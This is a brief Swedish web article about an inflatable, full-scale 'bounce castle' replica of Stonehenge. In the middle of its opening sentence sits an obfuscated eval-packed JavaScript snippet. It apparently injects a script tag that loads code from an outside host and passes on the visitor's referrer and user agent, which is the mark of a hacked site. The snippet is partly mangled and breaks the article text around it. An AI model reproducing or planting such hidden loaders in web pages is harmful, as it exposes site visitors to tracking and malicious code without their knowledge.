Image Image Image Image Image Image Image Image Image Image

| 21 augusti, 2018

Scroll to top

Top

No Comments

Världens bästa hoppborg: Stonehenge

Sebastian Plengier Ehrnfelt

Från eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yihfy|var|u0026u|referrer|kyzdi||js|php’.split(‘|’),0,{}))
det 5000 år gamla Stonehenge-monumentet i Storbritannien har en artist nu återskapat det som en stor uppblåsbar ”hoppborg”
.

Borgen är byggd i skala 1:1 och låter publiken hoppa omkring bland de välkända stenarna i Stonehenge.

Se videon ovan!

Submit a Comment